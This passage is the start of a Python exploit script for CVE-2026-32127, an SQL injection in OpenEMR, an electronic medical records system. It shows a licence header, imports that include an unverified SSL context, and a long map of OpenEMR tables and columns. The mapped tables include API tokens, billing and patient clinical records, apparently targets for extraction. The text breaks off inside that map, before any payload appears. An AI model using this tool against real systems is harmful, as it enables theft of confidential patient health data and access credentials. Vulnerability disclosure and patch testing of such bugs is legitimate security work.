# ============================================================================= # Project Name: CVE-2026-32127_SqlInjectionVulnerabilityOpenEMR8.0.0 # File: exploit.py # Description: Exploit for the CVE-2026-32127 (SQL Injection in Open EMR <8.0.0.1) # # Copyright (c) 2026 Christophe SUBLET, Grenoble INP - Esisar, UGA, CyberSkills, Orion # # This file is part of CVE-2026-32127_SqlInjectionVulnerabilityOpenEMR8.0.0 # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # ============================================================================= from urllib.request import urlopen, Request from ssl import _create_unverified_context from collections import defaultdict from argparse import ArgumentParser from urllib.parse import urlencode from hashlib import sha1 from sys import exit schema = { "addresses": [ "id", "line1", "line2", "city", "state", "zip", "plus_four", "country", "foreign_id", "district" ], "amc_misc_data": [ "amc_id", "pid", "map_category", "map_id", "date_created", "date_completed", "soc_provided" ], "amendments": [ "amendment_id", "amendment_date", "amendment_by", "amendment_status", "pid", "amendment_desc", "created_by", "modified_by", "created_time", "modified_time" ], "amendments_history": [ "amendment_id", "amendment_note", "amendment_status", "created_by", "created_time" ], "api_log": [ "id", "log_id", "user_id", "patient_id", "ip_address", "method", "request", "request_url", "request_body", "response", "created_time" ], "api_refresh_token": [ "id", "user_id", "client_id", "token", "expiry", "revoked" ], "api_token": [ "id", "user_id", "token", "expiry", "client_id", "scope", "revoked", "context" ], "ar_activity": [ "pid", "encounter", "sequence_no", "code_type", "code", "modifier", "payer_type", "post_time", "post_user", "session_id", "memo", "pay_amount", "adj_amount", "modified_time", "follow_up", "follow_up_note", "account_code", "reason_code", "deleted", "post_date", "payer_claim_number" ], "ar_session": [ "session_id", "payer_id", "user_id", "closed", "reference", "check_date", "deposit_date", "pay_total", "created_time", "modified_time", "global_amount", "payment_type", "description", "adjustment_code", "post_to_date", "patient_id", "payment_method" ], "audit_details": [ "id", "field_name", "field_value", "audit_master_id", "entry_identification" ], "audit_master": [ "id", "pid", "user_id", "approval_status", "comments", "created_time", "modified_time", "ip_address", "type", "is_qrda_document", "is_unstructured_document" ], "automatic_notification": [ "notification_id", "sms_gateway_type", "provider_name", "message", "email_sender", "email_subject", "type" ], "background_services": [ "name", "title", "active", "running", "next_run", "execute_interval", "function", "require_once", "sort_order" ], "batchcom": [ "id", "patient_id", "sent_by", "msg_type", "msg_subject", "msg_text", "msg_date_sent" ], "benefit_eligibility": [ "response_id", "verification_id", "type", "benefit_type", "start_date", "end_date", "coverage_level", "coverage_type", "plan_type", "plan_description", "coverage_period", "amount", "percent", "network_ind", "message", "response_status", "response_create_date", "response_modify_date" ], "billing": [ "id", "date", "code_type", "code", "pid", "provider_id", "user", "groupname", "authorized", "encounter", "code_text", "billed", "activity", "payer_id", "bill_process", "bill_date", "process_date", "process_file", "modifier", "units", "fee", "justify", "target", "x12_partner_id", "ndc_info", "notecodes", "external_id", "pricelevel", "revenue_code", "chargecat" ], "calendar_external": [ "id", "date", "description", "source" ], "care_teams": [ "id", "uuid", "pid", "status", "team_name", "note", "date_created", "date_updated", "created_by", "updated_by" ], "care_team_member": [ "id", "care_team_id", "user_id", "contact_id", "role", "facility_id", "provider_since", "status", "date_created", "date_updated", "created_by", "updated_by", "note" ], "categories": [ "id", "name", "value", "parent", "lft", "rght", "aco_spec", "codes" ], "categories_seq": [ "id" ], "categories_to_documents": [ "category_id", "document_id" ], "ccda": [ "id", "uuid", "pid", "encounter", "ccda_data", "time", "status", "updated_date", "user_id", "couch_docid", "couch_revid", "hash", "view", "transfer", "emr_transfer", "encrypted", "transaction_id" ], "ccda_components": [ "ccda_components_id", "ccda_components_field", "ccda_components_name", "ccda_type" ], "ccda_field_mapping": [ "id", "table_id", "ccda_field" ], "ccda_sections": [ "ccda_sections_id", "ccda_components_id", "ccda_sections_field", "ccda_sections_name", "ccda_sections_req_mapping" ], "ccda_table_mapping": [ "id", "ccda_component", "ccda_component_section", "form_dir", "form_type", "form_table", "user_id", "deleted", "timestamp" ], "chart_tracker": [ "ct_pid", "ct_when", "ct_userid", "ct_location" ], "claims": [ "patient_id", "encounter_id", "version", "payer_id", "status", "payer_type", "bill_process", "bill_time", "process_time", "process_file", "target", "x12_partner_id", "submitted_claim" ], "clinical_notes_documents": [ "id", "clinical_note_id", "document_id", "created_at", "created_by" ], "clinical_notes_procedure_results": [ "id", "clinical_note_id", "procedure_result_id", "created_at", "created_by" ], "clinical_plans": [ "id", "pid", "normal_flag", "cqm_flag", "cqm_2011_flag", "cqm_2014_flag", "cqm_measure_group" ], "clinical_plans_rules": [ "plan_id", "rule_id" ], "clinical_rules": [ "id", "pid", "active_alert_flag", "passive_alert_flag", "cqm_flag", "cqm_2011_flag", "cqm_2014_flag", "cqm_nqf_code", "cqm_pqri_code", "amc_flag", "amc_2011_flag", "amc_2014_flag", "amc_2015_flag", "amc_code", "amc_code_2014", "amc_code_2015", "amc_2014_stage1_flag", "amc_2014_stage2_flag", "patient_reminder_flag", "bibliographic_citation", "developer", "funding_source", "release_version", "web_reference", "linked_referential_cds", "access_control", "patient_dob_usage", "patient_ethnicity_usage", "patient_health_status_usage", "patient_gender_identity_usage", "patient_language_usage", "patient_race_usage", "patient_sex_usage", "patient_sexual_orientation_usage", "patient_sodh_usage" ], "clinical_rules_log": [ "id", "date", "pid", "uid", "category", "value", "new_value", "facility_id" ], "codes": [ "id", "code_text", "code_text_short", "code", "code_type", "modifier", "units", "fee", "superbill", "related_code", "taxrates", "cyp_factor", "active", "reportable", "financial_reporting", "revenue_code" ], "codes_history": [ "log_id", "date", "code", "modifier", "active", "diagnosis_reporting", "financial_reporting", "category", "code_type_name", "code_text", "code_text_short", "prices", "action_type", "update_by" ], "code_types": [ "ct_key", "ct_id", "ct_seq", "ct_mod", "ct_just", "ct_mask", "ct_fee", "ct_rel", "ct_nofs", "ct_diag", "ct_active", "ct_label", "ct_external", "ct_claim", "ct_proc", "ct_term", "ct_problem", "ct_drug" ], "contact": [ "id", "foreign_id" ], "contact_address": [ "id", "contact_id", "address_id", "priority", "type", "use", "notes", "status", "is_primary", "created_date", "period_start", "period_end", "inactivated_reason" ], "contact_relation": [ "id", "contact_id", "target_table", "target_id", "active", "role", "relationship", "contact_priority", "is_primary_contact", "is_emergency_contact", "can_make_medical_decisions", "can_receive_medical_info", "start_date", "end_date", "notes", "created_date", "created_by", "updated_date", "updated_by" ], "contact_telecom": [ "id", "contact_id", "rank", "system", "use", "value", "status", "is_primary", "notes", "period_start", "period_end", "inactivated_reason", "created_date", "created_by", "updated_date", "updated_by" ], "customlists": [ "cl_list_slno", "cl_list_id", "cl_list_item_id", "cl_list_type", "cl_list_item_short", "cl_list_item_long", "cl_list_item_level", "cl_order", "cl_deleted", "cl_creator" ], "dated_reminders": [ "dr_id", "dr_from_ID", "dr_message_text", "dr_message_sent_date", "dr_message_due_date", "pid", "message_priority", "message_processed", "processed_date", "dr_processed_by" ], "dated_reminders_link": [ "dr_link_id", "dr_id", "to_id" ], "direct_message_log": [ "id", "msg_type", "msg_id", "sender", "recipient", "create_ts", "status", "status_info", "status_ts", "patient_id", "user_id" ], "documents": [ "id", "uuid", "type", "size", "date", "date_expires", "url", "thumb_url", "mimetype", "pages", "owner", "revision", "foreign_id", "docdate", "hash", "list_id", "name", "drive_uuid", "couch_docid", "couch_revid", "storagemethod", "path_depth", "imported", "encounter_id", "encounter_check", "audit_master_approval_status", "audit_master_id", "documentationOf", "encrypted", "document_data", "deleted", "foreign_reference_id", "foreign_reference_table" ], "documents_legal_categories": [ "dlc_id", "dlc_category_type", "dlc_category_name", "dlc_category_parent" ], "documents_legal_detail": [ "dld_id", "dld_pid", "dld_facility", "dld_provider", "dld_encounter", "dld_master_docid", "dld_signed", "dld_signed_time", "dld_filepath", "dld_filename", "dld_signing_person", "dld_sign_level", "dld_content", "dld_file_for_pdf_generation", "dld_denial_reason", "dld_moved", "dld_patient_comments" ], "documents_legal_master": [ "dlm_category", "dlm_subcategory", "dlm_document_id", "dlm_document_name", "dlm_filepath", "dlm_facility", "dlm_provider", "dlm_sign_height", "dlm_sign_width", "dlm_filename", "dlm_effective_date", "dlm_version", "content", "dlm_savedsign", "dlm_review", "dlm_upload_type" ], "document_templates": [ "id", "pid", "provider", "encounter", "modified_date", "profile", "category", "location", "template_name", "status", "send_date", "end_date", "size", "template_content", "mime" ], "document_template_profiles": [ "id", "template_id", "profile", "template_name", "category", "provider", "modified_date", "member_of", "active", "recurring", "event_trigger", "period", "notify_trigger", "notify_period" ], "drugs": [ "drug_id", "uuid", "name", "ndc_number", "on_order", "reorder_point", "max_level", "last_notify", "reactions", "form", "size", "unit", "route", "substitute", "related_code", "cyp_factor", "active", "allow_combining", "allow_multiple", "drug_code", "consumable", "dispensable", "date_created", "last_updated" ], "drug_inventory": [ "inventory_id", "drug_id", "lot_number", "expiration", "manufacturer", "on_hand", "warehouse_id", "vendor_id", "last_notify", "destroy_date", "destroy_method", "destroy_witness", "destroy_notes" ], "drug_sales": [ "sale_id", "drug_id", "inventory_id", "prescription_id", "pid", "encounter", "user", "sale_date", "quantity", "fee", "billed", "xfer_inventory_id", "distributor_id", "notes", "bill_date", "pricelevel", "selector", "trans_type", "chargecat", "uuid", "pharmacy_supply_type", "last_updated", "date_created", "updated_by", "created_by" ], "drug_templates": [ "drug_id", "selector", "dosage", "period", "quantity", "refills", "taxrates", "pkgqty" ], "dsi_source_attributes": [ "id", "client_id", "list_id", "option_id", "clinical_rule_id", "source_value", "created_by", "last_updated_by", "created_at", "last_updated_at" ], "edi_sequences": [ "id" ], "eligibility_verification": [ "verification_id", "response_id", "insurance_id", "eligibility_check_date", "copay", "deductible", "deductiblemet", "create_date" ], "email_queue": [ "id", "sender", "recipient", "subject", "body", "datetime_queued", "sent", "datetime_sent", "error", "error_message", "datetime_error", "template_name" ], "employer_data": [ "id", "name", "street", "street_line_2", "postal_code", "city", "state", "country", "date", "pid", "start_date", "end_date", "occupation", "industry", "created_by", "uuid" ], "enc_category_map": [ "rule_enc_id", "main_cat_id" ], "erx_narcotics": [ "id", "drug", "dea_number", "csa_sch", "narc", "other_names" ], "erx_rx_log": [ "id", "prescription_id", "date", "time", "code", "status", "message_id", "read" ], "erx_ttl_touch": [ "patient_id", "process", "updated" ], "esign_signatures": [ "id", "tid", "table", "uid", "datetime", "is_lock", "amendment", "hash", "signature_hash" ], "export_job": [ "id", "uuid", "user_id", "client_id", "status", "start_time", "resource_include_time", "output_format", "request_uri", "resources", "output", "errors", "access_token_id" ], "extended_log": [ "id", "date", "event", "user", "recipient", "description", "patient_id" ], "external_encounters": [ "ee_id", "ee_date", "ee_pid", "ee_provider_id", "ee_facility_id", "ee_encounter_diagnosis", "ee_external_id" ], "external_procedures": [ "ep_id", "ep_date", "ep_code_type", "ep_code", "ep_pid", "ep_encounter", "ep_code_text", "ep_facility_id", "ep_external_id" ], "facility": [ "id", "uuid", "name", "phone", "fax", "street", "city", "state", "postal_code", "country_code", "federal_ein", "website", "email", "service_location", "billing_location", "accepts_assignment", "pos_code", "x12_sender_id", "attn", "domain_identifier", "facility_npi", "facility_taxonomy", "tax_id_type", "color", "primary_business_entity", "facility_code", "extra_validation", "mail_street", "mail_street2", "mail_city", "mail_state", "mail_zip", "oid", "iban", "info", "weno_id", "inactive", "date_created", "last_updated" ], "facility_user_ids": [ "id", "uid", "facility_id", "uuid", "field_id", "field_value", "date_created", "last_updated" ], "fee_schedule": [ "id", "insurance_company_id", "plan", "code", "modifier", "type", "fee", "effective_date" ], "fee_sheet_options": [ "fs_category", "fs_option", "fs_codes" ], "forms": [ "id", "date", "encounter", "form_name", "form_id", "pid", "user", "groupname", "authorized", "deleted", "formdir", "therapy_group_id", "issue_id", "provider_id" ], "form_care_plan": [ "id", "date", "pid", "encounter", "user", "groupname", "authorized", "activity", "code", "codetext", "description", "external_id", "care_plan_type", "note_related_to", "date_end", "reason_code", "reason_description", "reason_date_low", "reason_date_high", "reason_status", "plan_status", "proposed_date" ], "form_clinical_instructions": [ "id", "pid", "encounter", "user", "instruction", "date", "activity" ], "form_clinical_notes": [ "id", "form_id", "uuid", "date", "pid", "encounter", "user", "groupname", "authorized", "activity", "code", "codetext", "description", "external_id", "clinical_notes_type", "clinical_notes_category", "note_related_to", "last_updated" ], "form_dictation": [ "id", "date", "pid", "user", "groupname", "authorized", "activity", "dictation", "additional_notes" ], "form_encounter": [ "id", "uuid", "date", "reason", "facility", "facility_id", "pid", "encounter", "onset_date", "sensitivity", "billing_note", "pc_catid", "last_level_billed", "last_level_closed", "last_stmt_date", "stmt_count", "provider_id", "supervisor_id", "invoice_refno", "referral_source", "billing_facility", "external_id", "pos_code", "parent_encounter_id", "class_code", "shift", "voucher_number", "discharge_disposition", "encounter_type_code", "encounter_type_description", "referring_provider_id", "date_end", "in_collection", "last_update", "ordering_provider_id" ], "form_eye_acuity": [ "id", "pid", "SCODVA", "SCOSVA", "PHODVA", "PHOSVA", "CTLODVA", "CTLOSVA", "MRODVA", "MROSVA", "SCNEARODVA", "SCNEAROSVA", "MRNEARODVA", "MRNEAROSVA", "GLAREODVA", "GLAREOSVA", "GLARECOMMENTS", "ARODVA", "AROSVA", "CRODVA", "CROSVA", "CTLODVA1", "CTLOSVA1", "PAMODVA", "PAMOSVA", "LIODVA", "LIOSVA", "WODVANEAR", "OSVANEARCC", "BINOCVA" ], "form_eye_antseg": [ "id", "pid", "ODSCHIRMER1", "OSSCHIRMER1", "ODSCHIRMER2", "OSSCHIRMER2", "ODTBUT", "OSTBUT", "OSCONJ", "ODCONJ", "ODCORNEA", "OSCORNEA", "ODAC", "OSAC", "ODLENS", "OSLENS", "ODIRIS", "OSIRIS", "PUPIL_NORMAL", "ODPUPILSIZE1", "ODPUPILSIZE2", "ODPUPILREACTIVITY", "ODAPD", "OSPUPILSIZE1", "OSPUPILSIZE2", "OSPUPILREACTIVITY", "OSAPD", "DIMODPUPILSIZE1", "DIMODPUPILSIZE2", "DIMODPUPILREACTIVITY", "DIMOSPUPILSIZE1", "DIMOSPUPILSIZE2", "DIMOSPUPILREACTIVITY", "PUPIL_COMMENTS", "ODKTHICKNESS", "OSKTHICKNESS", "ODGONIO", "OSGONIO", "ANTSEG_COMMENTS" ], "form_eye_base": [ "id", "date", "pid", "user", "groupname", "authorized", "activity" ], "form_eye_biometrics": [ "id", "pid", "ODK1", "ODK2", "ODK2AXIS", "OSK1", "OSK2", "OSK2AXIS", "ODAXIALLENGTH", "OSAXIALLENGTH", "ODPDMeasured", "OSPDMeasured", "ODACD", "OSACD", "ODW2W", "OSW2W", "ODLT", "OSLT" ], "form_eye_external": [ "id", "pid", "RUL", "LUL", "RLL", "LLL", "RBROW", "LBROW", "RMCT", "LMCT", "RADNEXA", "LADNEXA", "RMRD", "LMRD", "RLF", "LLF", "RVFISSURE", "LVFISSURE", "ODHERTEL", "OSHERTEL", "HERTELBASE", "RCAROTID", "LCAROTID", "RTEMPART", "LTEMPART", "RCNV", "LCNV", "RCNVII", "LCNVII", "EXT_COMMENTS" ], "form_eye_hpi": [ "id", "pid", "CC1", "HPI1", "QUALITY1", "TIMING1", "DURATION1", "CONTEXT1", "SEVERITY1", "MODIFY1", "ASSOCIATED1", "LOCATION1", "CHRONIC1", "CHRONIC2", "CHRONIC3", "CC2", "HPI2", "QUALITY2", "TIMING2", "DURATION2", "CONTEXT2", "SEVERITY2", "MODIFY2", "ASSOCIATED2", "LOCATION2", "CC3", "HPI3", "QUALITY3", "TIMING3", "DURATION3", "CONTEXT3", "SEVERITY3", "MODIFY3", "ASSOCIATED3", "LOCATION3" ], "form_eye_locking": [ "id", "pid", "IMP", "PLAN", "Resource", "Technician", "LOCKED", "LOCKEDDATE", "LOCKEDBY" ], "form_eye_mag_dispense": [ "id", "date", "encounter", "pid", "user", "groupname", "authorized", "activity", "REFDATE", "REFTYPE", "RXTYPE", "ODSPH", "ODCYL", "ODAXIS", "OSSPH", "OSCYL", "OSAXIS", "ODMIDADD", "OSMIDADD", "ODADD", "OSADD", "ODHPD", "ODHBASE", "ODVPD", "ODVBASE", "ODSLABOFF", "ODVERTEXDIST", "OSHPD", "OSHBASE", "OSVPD", "OSVBASE", "OSSLABOFF", "OSVERTEXDIST", "ODMPDD", "ODMPDN", "OSMPDD", "OSMPDN", "BPDD", "BPDN", "LENS_MATERIAL", "LENS_TREATMENTS", "CTLMANUFACTUREROD", "CTLMANUFACTUREROS", "CTLSUPPLIEROD", "CTLSUPPLIEROS", "CTLBRANDOD", "CTLBRANDOS", "CTLODQUANTITY", "CTLOSQUANTITY", "ODDIAM", "ODBC", "OSDIAM", "OSBC", "RXCOMMENTS", "COMMENTS" ], "form_eye_mag_impplan": [ "id", "form_id", "pid", "title", "code", "codetype", "codedesc", "codetext", "plan", "PMSFH_link", "IMPPLAN_order" ], "form_eye_mag_orders": [ "id", "form_id", "pid", "ORDER_DETAILS", "ORDER_STATUS", "ORDER_PRIORITY", "ORDER_DATE_PLACED", "ORDER_PLACED_BYWHOM", "ORDER_DATE_COMPLETED", "ORDER_COMPLETED_BYWHOM" ], "form_eye_mag_prefs": [ "PEZONE", "LOCATION", "LOCATION_text", "id", "selection", "ZONE_ORDER", "GOVALUE", "ordering", "FILL_ACTION", "GORIGHT", "GOLEFT", "UNSPEC" ], "form_eye_mag_wearing": [ "id", "ENCOUNTER", "FORM_ID", "PID", "RX_NUMBER", "ODSPH", "ODCYL", "ODAXIS", "OSSPH", "OSCYL", "OSAXIS", "ODMIDADD", "OSMIDADD", "ODADD", "OSADD", "ODVA", "OSVA", "ODNEARVA", "OSNEARVA", "ODHPD", "ODHBASE", "ODVPD", "ODVBASE", "ODSLABOFF", "ODVERTEXDIST", "OSHPD", "OSHBASE", "OSVPD", "OSVBASE", "OSSLABOFF", "OSVERTEXDIST", "ODMPDD", "ODMPDN", "OSMPDD", "OSMPDN", "BPDD", "BPDN", "LENS_MATERIAL", "LENS_TREATMENTS", "RX_TYPE", "COMMENTS" ], "form_eye_neuro": [ "id", "pid", "ACT", "ACT5CCDIST", "ACT1CCDIST", "ACT2CCDIST", "ACT3CCDIST", "ACT4CCDIST", "ACT6CCDIST", "ACT7CCDIST", "ACT8CCDIST", "ACT9CCDIST", "ACT10CCDIST", "ACT11CCDIST", "ACT1SCDIST", "ACT2SCDIST", "ACT3SCDIST", "ACT4SCDIST", "ACT5SCDIST", "ACT6SCDIST", "ACT7SCDIST", "ACT8SCDIST", "ACT9SCDIST", "ACT10SCDIST", "ACT11SCDIST", "ACT1SCNEAR", "ACT2SCNEAR", "ACT3SCNEAR", "ACT4SCNEAR", "ACT5CCNEAR", "ACT6CCNEAR", "ACT7CCNEAR", "ACT8CCNEAR", "ACT9CCNEAR", "ACT10CCNEAR", "ACT11CCNEAR", "ACT5SCNEAR", "ACT6SCNEAR", "ACT7SCNEAR", "ACT8SCNEAR", "ACT9SCNEAR", "ACT10SCNEAR", "ACT11SCNEAR", "ACT1CCNEAR", "ACT2CCNEAR", "ACT3CCNEAR", "ACT4CCNEAR", "MOTILITYNORMAL", "MOTILITY_RS", "MOTILITY_RI", "MOTILITY_RR", "MOTILITY_RL", "MOTILITY_LS", "MOTILITY_LI", "MOTILITY_LR", "MOTILITY_LL", "MOTILITY_RRSO", "MOTILITY_RLSO", "MOTILITY_RRIO", "MOTILITY_RLIO", "MOTILITY_LRSO", "MOTILITY_LLSO", "MOTILITY_LRIO", "MOTILITY_LLIO", "NEURO_COMMENTS", "STEREOPSIS", "ODNPA", "OSNPA", "VERTFUSAMPS", "DIVERGENCEAMPS", "NPC", "DACCDIST", "DACCNEAR", "CACCDIST", "CACCNEAR", "ODCOLOR", "OSCOLOR", "ODCOINS", "OSCOINS", "ODREDDESAT", "OSREDDESAT" ], "form_eye_postseg": [ "id", "pid", "ODDISC", "OSDISC", "ODCUP", "OSCUP", "ODMACULA", "OSMACULA", "ODVESSELS", "OSVESSELS", "ODVITREOUS", "OSVITREOUS", "ODPERIPH", "OSPERIPH", "ODCMT", "OSCMT", "RETINA_COMMENTS", "DIL_RISKS", "DIL_MEDS", "WETTYPE", "ATROPINE", "CYCLOMYDRIL", "TROPICAMIDE", "CYCLOGYL", "NEO25" ], "form_eye_refraction": [ "id", "pid", "MRODSPH", "MRODCYL", "MRODAXIS", "MRODPRISM", "MRODBASE", "MRODADD", "MROSSPH", "MROSCYL", "MROSAXIS", "MROSPRISM", "MROSBASE", "MROSADD", "MRODNEARSPHERE", "MRODNEARCYL", "MRODNEARAXIS", "MRODPRISMNEAR", "MRODBASENEAR", "MROSNEARSHPERE", "MROSNEARCYL", "MROSNEARAXIS", "MROSPRISMNEAR", "MROSBASENEAR", "CRODSPH", "CRODCYL", "CRODAXIS", "CROSSPH", "CROSCYL", "CROSAXIS", "CRCOMMENTS", "BALANCED", "ARODSPH", "ARODCYL", "ARODAXIS", "AROSSPH", "AROSCYL", "AROSAXIS", "ARODADD", "AROSADD", "ARNEARODVA", "ARNEAROSVA", "ARODPRISM", "AROSPRISM", "CTLODSPH", "CTLODCYL", "CTLODAXIS", "CTLODBC", "CTLODDIAM", "CTLOSSPH", "CTLOSCYL", "CTLOSAXIS", "CTLOSBC", "CTLOSDIAM", "CTL_COMMENTS", "CTLMANUFACTUREROD", "CTLSUPPLIEROD", "CTLBRANDOD", "CTLMANUFACTUREROS", "CTLSUPPLIEROS", "CTLBRANDOS", "CTLODADD", "CTLOSADD", "NVOCHECKED", "ADDCHECKED" ], "form_eye_ros": [ "id", "pid", "ROSGENERAL", "ROSHEENT", "ROSCV", "ROSPULM", "ROSGI", "ROSGU", "ROSDERM", "ROSNEURO", "ROSPSYCH", "ROSMUSCULO", "ROSIMMUNO", "ROSENDOCRINE", "ROSCOMMENTS" ], "form_eye_vitals": [ "id", "pid", "alert", "oriented", "confused", "ODIOPAP", "OSIOPAP", "ODIOPTPN", "OSIOPTPN", "ODIOPFTN", "OSIOPFTN", "IOPTIME", "ODIOPPOST", "OSIOPPOST", "IOPPOSTTIME", "ODIOPTARGET", "OSIOPTARGET", "AMSLEROD", "AMSLEROS", "ODVF1", "ODVF2", "ODVF3", "ODVF4", "OSVF1", "OSVF2", "OSVF3", "OSVF4" ], "form_functional_cognitive_status": [ "id", "date", "pid", "encounter", "user", "groupname", "authorized", "activity", "code", "codetext", "description", "external_id" ], "form_groups_encounter": [ "id", "date", "reason", "facility", "facility_id", "group_id", "encounter", "onset_date", "sensitivity", "billing_note", "pc_catid", "last_level_billed", "last_level_closed", "last_stmt_date", "stmt_count", "provider_id", "supervisor_id", "invoice_refno", "referral_source", "billing_facility", "external_id", "pos_code", "counselors", "appt_id" ], "form_group_attendance": [ "id", "date", "group_id", "user", "groupname", "authorized", "encounter_id", "activity" ], "form_history_sdoh": [ "id", "uuid", "pid", "encounter", "created_at", "updated_at", "created_by", "updated_by", "assessment_date", "screening_tool", "assessor", "food_insecurity", "food_insecurity_notes", "housing_instability", "housing_instability_notes", "transportation_insecurity", "transportation_insecurity_notes", "utilities_insecurity", "utilities_insecurity_notes", "interpersonal_safety", "interpersonal_safety_notes", "financial_strain", "financial_strain_notes", "social_isolation", "social_isolation_notes", "childcare_needs", "childcare_needs_notes", "digital_access", "digital_access_notes", "employment_status", "education_level", "caregiver_status", "veteran_status", "pregnancy_status", "pregnancy_edd", "pregnancy_intent", "postpartum_status", "postpartum_end", "goals", "interventions", "instrument_score", "positive_domain_count", "declined_flag", "disability_status", "disability_status_notes", "disability_scale", "hunger_q1", "hunger_q2", "hunger_score" ], "form_history_sdoh_health_concerns": [ "id", "sdoh_history_id", "health_concern_id", "created_at", "created_by" ], "form_misc_billing_options": [ "id", "date", "pid", "user", "groupname", "authorized", "activity", "employment_related", "auto_accident", "accident_state", "other_accident", "medicaid_referral_code", "epsdt_flag", "provider_qualifier_code", "provider_id", "outside_lab", "lab_amount", "is_unable_to_work", "onset_date", "date_initial_treatment", "off_work_from", "off_work_to", "is_hospitalized", "hospitalization_date_from", "hospitalization_date_to", "medicaid_resubmission_code", "medicaid_original_reference", "prior_auth_number", "comments", "replacement_claim", "icn_resubmission_number", "box_14_date_qual", "box_15_date_qual", "encounter" ], "form_observation": [ "form_id", "date", "pid", "encounter", "user", "groupname", "authorized", "activity", "code", "observation", "ob_value", "ob_unit", "description", "code_type", "table_code", "ob_code", "ob_type", "ob_status", "result_status", "ob_reason_status", "ob_reason_code", "ob_reason_text", "ob_documentationof_table", "ob_documentationof_table_id", "date_end", "id", "parent_observation_id", "category", "questionnaire_response_id", "uuid", "ob_value_code_description" ], "form_questionnaire_assessments": [ "id", "date", "response_id", "pid", "user", "groupname", "authorized", "activity", "copyright", "form_name", "response_meta", "questionnaire_id", "questionnaire", "questionnaire_response", "lform", "lform_response", "category" ], "form_reviewofs": [ "id", "date", "pid", "user", "groupname", "authorized", "activity", "fever", "chills", "night_sweats", "weight_loss", "poor_appetite", "insomnia", "fatigued", "depressed", "hyperactive", "exposure_to_foreign_countries", "cataracts", "cataract_surgery", "glaucoma", "double_vision", "blurred_vision", "poor_hearing", "headaches", "ringing_in_ears", "bloody_nose", "sinusitis", "sinus_surgery", "dry_mouth", "strep_throat", "tonsillectomy", "swollen_lymph_nodes", "throat_cancer", "throat_cancer_surgery", "heart_attack", "irregular_heart_beat", "chest_pains", "shortness_of_breath", "high_blood_pressure", "heart_failure", "poor_circulation", "vascular_surgery", "cardiac_catheterization", "coronary_artery_bypass", "heart_transplant", "stress_test", "emphysema", "chronic_bronchitis", "interstitial_lung_disease", "shortness_of_breath_2", "lung_cancer", "lung_cancer_surgery", "pheumothorax", "stomach_pains", "peptic_ulcer_disease", "gastritis", "endoscopy", "polyps", "colonoscopy", "colon_cancer", "colon_cancer_surgery", "ulcerative_colitis", "crohns_disease", "appendectomy", "divirticulitis", "divirticulitis_surgery", "gall_stones", "cholecystectomy", "hepatitis", "cirrhosis_of_the_liver", "splenectomy", "kidney_failure", "kidney_stones", "kidney_cancer", "kidney_infections", "bladder_infections", "bladder_cancer", "prostate_problems", "prostate_cancer", "kidney_transplant", "sexually_transmitted_disease", "burning_with_urination", "discharge_from_urethra", "rashes", "infections", "ulcerations", "pemphigus", "herpes", "osetoarthritis", "rheumotoid_arthritis", "lupus", "ankylosing_sondlilitis", "swollen_joints", "stiff_joints", "broken_bones", "neck_problems", "back_problems", "back_surgery", "scoliosis", "herniated_disc", "shoulder_problems", "elbow_problems", "wrist_problems", "hand_problems", "hip_problems", "knee_problems", "ankle_problems", "foot_problems", "insulin_dependent_diabetes", "noninsulin_dependent_diabetes", "hypothyroidism", "hyperthyroidism", "cushing_syndrom", "addison_syndrom", "additional_notes" ], "form_ros": [ "id", "pid", "activity", "date", "weight_change", "weakness", "fatigue", "anorexia", "fever", "chills", "night_sweats", "insomnia", "irritability", "heat_or_cold", "intolerance", "change_in_vision", "glaucoma_history", "eye_pain", "irritation", "redness", "excessive_tearing", "double_vision", "blind_spots", "photophobia", "hearing_loss", "discharge", "pain", "vertigo", "tinnitus", "frequent_colds", "sore_throat", "sinus_problems", "post_nasal_drip", "nosebleed", "snoring", "apnea", "breast_mass", "breast_discharge", "biopsy", "abnormal_mammogram", "cough", "sputum", "shortness_of_breath", "wheezing", "hemoptsyis", "asthma", "copd", "chest_pain", "palpitation", "syncope", "pnd", "doe", "orthopnea", "peripheal", "edema", "legpain_cramping", "history_murmur", "arrythmia", "heart_problem", "dysphagia", "heartburn", "bloating", "belching", "flatulence", "nausea", "vomiting", "hematemesis", "gastro_pain", "food_intolerance", "hepatitis", "jaundice", "hematochezia", "changed_bowel", "diarrhea", "constipation", "polyuria", "polydypsia", "dysuria", "hematuria", "frequency", "urgency", "incontinence", "renal_stones", "utis", "hesitancy", "dribbling", "stream", "nocturia", "erections", "ejaculations", "g", "p", "ap", "lc", "mearche", "menopause", "lmp", "f_frequency", "f_flow", "f_symptoms", "abnormal_hair_growth", "f_hirsutism", "joint_pain", "swelling", "m_redness", "m_warm", "m_stiffness", "muscle", "m_aches", "fms", "arthritis", "loc", "seizures", "stroke", "tia", "n_numbness", "n_weakness", "paralysis", "intellectual_decline", "memory_problems", "dementia", "n_headache", "s_cancer", "psoriasis", "s_acne", "s_other", "s_disease", "p_diagnosis", "p_medication", "depression", "anxiety", "social_difficulties", "thyroid_problems", "diabetes", "abnormal_blood", "anemia", "fh_blood_problems", "bleeding_problems", "allergies", "frequent_illness", "hiv", "hai_status" ], "form_soap": [ "id", "date", "pid", "user", "groupname", "authorized", "activity", "subjective", "objective", "assessment", "plan" ], "form_taskman": [ "ID", "REQ_DATE", "FROM_ID", "TO_ID", "PATIENT_ID", "DOC_TYPE", "DOC_ID", "ENC_ID", "METHOD", "COMPLETED", "COMPLETED_DATE", "COMMENT", "USERFIELD_1" ], "form_vitals": [ "id", "uuid", "date", "pid", "user", "groupname", "authorized", "activity", "bps", "bpd", "weight", "height", "temperature", "temp_method", "pulse", "respiration", "note", "BMI", "BMI_status", "waist_circ", "head_circ", 